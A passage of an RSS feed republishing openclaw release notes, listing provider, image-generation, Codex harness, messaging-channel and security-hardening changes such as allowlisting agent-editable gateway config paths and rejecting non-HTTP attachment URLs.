<li>Providers/Anthropic Vertex: restore ADC-backed model discovery after the lightweight provider-discovery path by resolving emitted discovery entries, exposing synthetic auth on bootstrap discovery, and honoring copied env snapshots when probing the default GCP ADC path. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4251357682" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65715" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65715/hovercard" href="https://github.com/openclaw/openclaw/issues/65715">#65715</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4251358554" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65716" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65716/hovercard" href="https://github.com/openclaw/openclaw/pull/65716">#65716</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/feiskyer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/feiskyer">@feiskyer</a>.</li>
<li>Codex harness/status: pin embedded harness selection per session, show active non-PI harness ids such as <code>codex</code> in <code>/status</code>, and keep legacy transcripts on PI until <code>/new</code> or <code>/reset</code> so config changes cannot hot-switch existing sessions.</li>
<li>Gateway/security: fail closed on agent-driven <code>gateway config.apply</code>/<code>config.patch</code> runtime edits by allowlisting a narrow set of agent-tunable prompt, model, and mention-gating paths (including Telegram topic-level <code>requireMention</code>) instead of relying on a hand-maintained denylist of protected subtrees that could miss new sensitive config keys. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317956002" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70726" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70726/hovercard" href="https://github.com/openclaw/openclaw/pull/70726">#70726</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/drobison00/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/drobison00">@drobison00</a>.</li>
<li>Webhooks/security: re-resolve <code>SecretRef</code>-backed webhook route secrets on each request so <code>openclaw secrets reload</code> revokes the previous secret immediately instead of waiting for a gateway restart. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317967302" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70727" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70727/hovercard" href="https://github.com/openclaw/openclaw/pull/70727">#70727</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/drobison00/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/drobison00">@drobison00</a>.</li>
<li>Memory/dreaming: decouple the managed dreaming cron from heartbeat by running it as an isolated lightweight agent turn, so dreaming runs even when heartbeat is disabled for the default agent and is no longer skipped by <code>heartbeat.activeHours</code>. <code>openclaw doctor --fix</code> migrates stale main-session dreaming jobs in persisted cron configs to the new shape. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4304626834" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69811" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69811/hovercard" href="https://github.com/openclaw/openclaw/issues/69811">#69811</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4271783037" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67397" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67397/hovercard" href="https://github.com/openclaw/openclaw/issues/67397">#67397</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4291011689" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68972" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68972/hovercard" href="https://github.com/openclaw/openclaw/issues/68972">#68972</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4318151876" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70737" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70737/hovercard" href="https://github.com/openclaw/openclaw/pull/70737">#70737</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jalehman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jalehman">@jalehman</a>.</li>
<li>Agents/CLI: keep <code>--agent</code> plus <code>--session-id</code> lookup scoped to the requested agent store, so explicit agent resumes cannot select another agent's session. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4321202277" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70985" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70985/hovercard" href="https://github.com/openclaw/openclaw/pull/70985">#70985</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/frankekn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/frankekn">@frankekn</a>.</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[openclaw 2026.4.23-beta.6]]></title>
<description><![CDATA[2026.4.23
Changes

Providers/OpenAI: add image generation and reference-image editing through Codex OAuth, so openai/gpt-image-2 works without an OPENAI_API_KEY. Fixes #70703.
Providers/OpenRouter: add image generation and reference-image editing through image_generate, so OpenRouter image models...]]></description>
<link>https://tsecurity.de/de/3461833/downloads/openclaw-2026423-beta6/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3461833/downloads/openclaw-2026423-beta6/</guid>
<pubDate>Fri, 24 Apr 2026 16:46:00 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>2026.4.23</h2>
<h3>Changes</h3>
<ul>
<li>Providers/OpenAI: add image generation and reference-image editing through Codex OAuth, so <code>openai/gpt-image-2</code> works without an <code>OPENAI_API_KEY</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317685103" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70703" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70703/hovercard" href="https://github.com/openclaw/openclaw/issues/70703">#70703</a>.</li>
<li>Providers/OpenRouter: add image generation and reference-image editing through <code>image_generate</code>, so OpenRouter image models work with <code>OPENROUTER_API_KEY</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4142164318" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55066" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/55066/hovercard" href="https://github.com/openclaw/openclaw/issues/55066">#55066</a> via <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4275765906" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67668" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/67668/hovercard" href="https://github.com/openclaw/openclaw/pull/67668">#67668</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/notamicrodose/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/notamicrodose">@notamicrodose</a>.</li>
<li>Image generation: let agents request provider-supported quality and output format hints, and pass OpenAI-specific background, moderation, compression, and user hints through the <code>image_generate</code> tool. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4313875031" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70503" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70503/hovercard" href="https://github.com/openclaw/openclaw/pull/70503">#70503</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ottodeng/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ottodeng">@ottodeng</a>.</li>
<li>Agents/subagents: add optional forked context for native <code>sessions_spawn</code> runs so agents can let a child inherit the requester transcript when needed, while keeping clean isolated sessions as the default; includes prompt guidance, context-engine hook metadata, docs, and QA coverage.</li>
<li>Agents/tools: add optional per-call <code>timeoutMs</code> support for image, video, music, and TTS generation tools so agents can extend provider request timeouts only when a specific generation needs it.</li>
<li>Memory/local embeddings: add configurable <code>memorySearch.local.contextSize</code> with a 4096 default so local embedding contexts can be tuned for constrained hosts without patching the memory host. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4314612454" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70544" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70544/hovercard" href="https://github.com/openclaw/openclaw/pull/70544">#70544</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/aalekh-sarvam/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/aalekh-sarvam">@aalekh-sarvam</a>.</li>
<li>Dependencies/Pi: update bundled Pi packages to <code>0.70.0</code>, use Pi's upstream <code>gpt-5.5</code> catalog metadata for OpenAI and OpenAI Codex, and keep only local <code>gpt-5.5-pro</code> forward-compat handling.</li>
<li>Codex harness: add structured debug logging for embedded harness selection decisions so <code>/status</code> stays simple while gateway logs explain auto-selection and Pi fallback reasons. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4318523130" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70760" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70760/hovercard" href="https://github.com/openclaw/openclaw/pull/70760">#70760</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/100yenadmin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/100yenadmin">@100yenadmin</a>.</li>
</ul>
<h3>Fixes</h3>
<ul>
<li>Codex harness: route native <code>request_user_input</code> prompts back to the originating chat, preserve queued follow-up answers, and honor newer app-server command approval amendment decisions.</li>
<li>Codex harness/context-engine: redact context-engine assembly failures before logging, so fallback warnings do not serialize raw error objects. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319234861" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70809" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70809/hovercard" href="https://github.com/openclaw/openclaw/pull/70809">#70809</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jalehman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jalehman">@jalehman</a>.</li>
<li>WhatsApp/onboarding: keep first-run setup entry loading off the Baileys runtime dependency path, so packaged QuickStart installs can show WhatsApp setup before runtime deps are staged. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4320441218" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70932" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70932/hovercard" href="https://github.com/openclaw/openclaw/issues/70932">#70932</a>.</li>
<li>Block streaming: suppress final assembled text after partial block-delivery aborts when the already-sent text chunks exactly cover the final reply, preventing duplicate replies without dropping unrelated short messages. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4320362931" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70921" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70921/hovercard" href="https://github.com/openclaw/openclaw/issues/70921">#70921</a>.</li>
<li>Codex harness/Windows: resolve npm-installed <code>codex.cmd</code> shims through PATHEXT before starting the native app-server, so <code>codex/*</code> models work without a manual <code>.exe</code> shim. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4320274139" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70913" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70913/hovercard" href="https://github.com/openclaw/openclaw/issues/70913">#70913</a>.</li>
<li>Slack/groups: classify MPIM group DMs as group chat context and suppress verbose tool/plan progress on Slack non-DM surfaces, so internal "Working…" traces no longer leak into rooms. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4320271144" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70912" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70912/hovercard" href="https://github.com/openclaw/openclaw/issues/70912">#70912</a>.</li>
<li>Agents/replay: stop OpenAI/Codex transcript replay from synthesizing missing tool results while still preserving synthetic repair on Anthropic, Gemini, and Bedrock transport-owned sessions. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4208825313" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61556" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/61556/hovercard" href="https://github.com/openclaw/openclaw/pull/61556">#61556</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/VictorJeon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/VictorJeon">@VictorJeon</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Telegram/media replies: parse remote markdown image syntax into outbound media payloads on the final reply path, so Telegram group chats stop falling back to plain-text image URLs when the model or a tool emits <code>![...](...)</code> instead of a <code>MEDIA:</code> token. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4258333933" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66191" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66191/hovercard" href="https://github.com/openclaw/openclaw/issues/66191">#66191</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/apezam/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/apezam">@apezam</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Agents/WebChat: surface non-retryable provider failures such as billing, auth, and rate-limit errors from the embedded runner instead of logging <code>surface_error</code> and leaving webchat with no rendered error. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4308345521" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70124" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70124/hovercard" href="https://github.com/openclaw/openclaw/issues/70124">#70124</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319670589" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70848" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70848/hovercard" href="https://github.com/openclaw/openclaw/pull/70848">#70848</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/truffle-dev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/truffle-dev">@truffle-dev</a>.</li>
<li>WhatsApp: unify outbound media normalization across direct sends and auto-replies. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mcaxtr/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mcaxtr">@mcaxtr</a>.</li>
<li>Memory/CLI: declare the built-in <code>local</code> embedding provider in the memory-core manifest, so standalone <code>openclaw memory status</code>, <code>index</code>, and <code>search</code> can resolve local embeddings just like the gateway runtime. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319498725" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70836" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70836/hovercard" href="https://github.com/openclaw/openclaw/issues/70836">#70836</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319903672" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70873" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70873/hovercard" href="https://github.com/openclaw/openclaw/pull/70873">#70873</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mattznojassist/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mattznojassist">@mattznojassist</a>.</li>
<li>Gateway/WebChat: preserve image attachments for text-only primary models by offloading them as media refs instead of dropping them, so configured image tools can still inspect the original file. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4287666211" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68513" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68513/hovercard" href="https://github.com/openclaw/openclaw/issues/68513">#68513</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4066225308" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44276" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44276/hovercard" href="https://github.com/openclaw/openclaw/issues/44276">#44276</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4112734613" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51656" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51656/hovercard" href="https://github.com/openclaw/openclaw/issues/51656">#51656</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4309685353" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70212" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70212/hovercard" href="https://github.com/openclaw/openclaw/issues/70212">#70212</a>.</li>
<li>Plugins/Google Meet: hang up delegated Twilio calls on leave, clean up Chrome realtime audio bridges when launch fails, and use a flat provider-safe tool schema.</li>
<li>Media understanding: honor explicit image-model configuration before native-vision skips, including <code>agents.defaults.imageModel</code>, <code>tools.media.image.models</code>, and provider image defaults such as MiniMax VL when the active chat model is text-only. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4079114113" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/47614" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/47614/hovercard" href="https://github.com/openclaw/openclaw/issues/47614">#47614</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4231959911" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63722" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63722/hovercard" href="https://github.com/openclaw/openclaw/issues/63722">#63722</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4292840857" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69171" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69171/hovercard" href="https://github.com/openclaw/openclaw/issues/69171">#69171</a>.</li>
<li>Codex/media understanding: support <code>codex/*</code> image models through bounded Codex app-server image turns, while keeping <code>openai-codex/*</code> on the OpenAI Codex OAuth route and validating app-server responses against generated protocol contracts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4309522289" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70201" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70201/hovercard" href="https://github.com/openclaw/openclaw/issues/70201">#70201</a>.</li>
<li>Providers/OpenAI Codex: synthesize the <code>openai-codex/gpt-5.5</code> OAuth model row when Codex catalog discovery omits it, so cron and subagent runs do not fail with <code>Unknown model</code> while the account is authenticated.</li>
<li>Models/Codex: preserve Codex provider metadata when adding models from chat or CLI commands, so manually added Codex models keep the right auth and routing behavior. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319321563" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70820" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70820/hovercard" href="https://github.com/openclaw/openclaw/pull/70820">#70820</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Takhoffman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Takhoffman">@Takhoffman</a>.</li>
<li>Providers/OpenAI: route <code>openai/gpt-image-2</code> through configured Codex OAuth directly when an <code>openai-codex</code> profile is active, instead of probing <code>OPENAI_API_KEY</code> first.</li>
<li>Providers/OpenAI: harden image generation auth routing and Codex OAuth response parsing so fallback only applies to public OpenAI API routes and bounded SSE results. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Takhoffman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Takhoffman">@Takhoffman</a>.</li>
<li>OpenAI/image generation: send reference-image edits as guarded multipart uploads instead of JSON data URLs, restoring complex multi-reference <code>gpt-image-2</code> edits. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4316931305" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70642" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70642/hovercard" href="https://github.com/openclaw/openclaw/issues/70642">#70642</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dashhuang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dashhuang">@dashhuang</a>.</li>
<li>Providers/OpenRouter: send image-understanding prompts as user text before image parts, restoring non-empty vision responses for OpenRouter multimodal models. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4312662772" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70410" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70410/hovercard" href="https://github.com/openclaw/openclaw/issues/70410">#70410</a>.</li>
<li>Providers/Google: honor the private-network SSRF opt-in for Gemini image generation requests, so trusted proxy setups that resolve Google API hosts to private addresses can use <code>image_generate</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4269431435" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67216" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67216/hovercard" href="https://github.com/openclaw/openclaw/issues/67216">#67216</a>.</li>
<li>Agents/transport: stop embedded runs from lowering the process-wide undici stream timeouts, so slow Gemini image generation and other long-running provider requests no longer inherit short run-attempt headers timeouts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4312763316" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70423" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70423/hovercard" href="https://github.com/openclaw/openclaw/issues/70423">#70423</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/giangthb/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/giangthb">@giangthb</a>.</li>
<li>Providers/OpenAI: honor the private-network SSRF opt-in for OpenAI-compatible image generation endpoints, so trusted LocalAI/LAN <code>image_generate</code> routes work without disabling SSRF checks globally. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4221864091" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62879" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62879/hovercard" href="https://github.com/openclaw/openclaw/issues/62879">#62879</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/seitzbg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/seitzbg">@seitzbg</a>.</li>
<li>Providers/OpenAI: stop advertising the removed <code>gpt-5.3-codex-spark</code> Codex model through fallback catalogs, and suppress stale rows with a GPT-5.5 recovery hint.</li>
<li>Control UI/chat: persist assistant-generated images as authenticated managed media and accept paired-device tokens for assistant media fetches, so webchat history reloads keep showing generated images. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317927968" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70719" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70719/hovercard" href="https://github.com/openclaw/openclaw/pull/70719">#70719</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4318227484" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70741" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70741/hovercard" href="https://github.com/openclaw/openclaw/pull/70741">#70741</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Patrick-Erichsen/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Patrick-Erichsen">@Patrick-Erichsen</a>.</li>
<li>Control UI/chat: queue Stop-button aborts across Gateway reconnects so a disconnected active run is canceled on reconnect instead of only clearing local UI state. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317304097" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70673" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70673/hovercard" href="https://github.com/openclaw/openclaw/pull/70673">#70673</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/chinar-amrutkar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/chinar-amrutkar">@chinar-amrutkar</a>.</li>
<li>Memory/QMD: recreate stale managed QMD collections when startup repair finds the collection name already exists, so root memory narrows back to <code>MEMORY.md</code> instead of staying on broad workspace markdown indexing.</li>
<li>Agents/OpenAI: surface selected-model capacity failures from PI, Codex, and auto-reply harness paths with a model-switch hint instead of the generic empty-response error. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/QR: replace legacy <code>qrcode-terminal</code> QR rendering with bounded <code>qrcode-tui</code> helpers for plugin login/setup flows. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4255382870" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65969" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65969/hovercard" href="https://github.com/openclaw/openclaw/pull/65969">#65969</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Voice-call/realtime: wait for OpenAI session configuration before greeting or forwarding buffered audio, and reject non-allowlisted Twilio callers before stream setup. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4061033395" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/43501" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/43501/hovercard" href="https://github.com/openclaw/openclaw/pull/43501">#43501</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/forrestblount/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/forrestblount">@forrestblount</a>.</li>
<li>ACPX/Codex: stop materializing <code>auth.json</code> bridge files for Codex ACP, Codex app-server, and Codex CLI runs; Codex-owned runtimes now use their normal <code>CODEX_HOME</code>/<code>~/.codex</code> auth path directly.</li>
<li>Auto-reply/system events: route async exec-event completion replies through the persisted session delivery context, so long-running command results return to the originating channel instead of being dropped when live origin metadata is missing. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4310392062" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70258" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70258/hovercard" href="https://github.com/openclaw/openclaw/pull/70258">#70258</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wzfukui/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wzfukui">@wzfukui</a>.</li>
<li>Gateway/sessions: extend the webchat session-mutation guard to <code>sessions.compact</code> and <code>sessions.compaction.restore</code>, so <code>WEBCHAT_UI</code> clients are rejected from compaction-side session mutations consistently with the existing patch/delete guards. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317846623" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70716" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70716/hovercard" href="https://github.com/openclaw/openclaw/pull/70716">#70716</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/drobison00/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/drobison00">@drobison00</a>.</li>
<li>QA channel/security: reject non-HTTP(S) inbound attachment URLs before media fetch, and log rejected schemes so suspicious or misconfigured payloads are visible during debugging. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317761421" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70708" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70708/hovercard" href="https://github.com/openclaw/openclaw/pull/70708">#70708</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
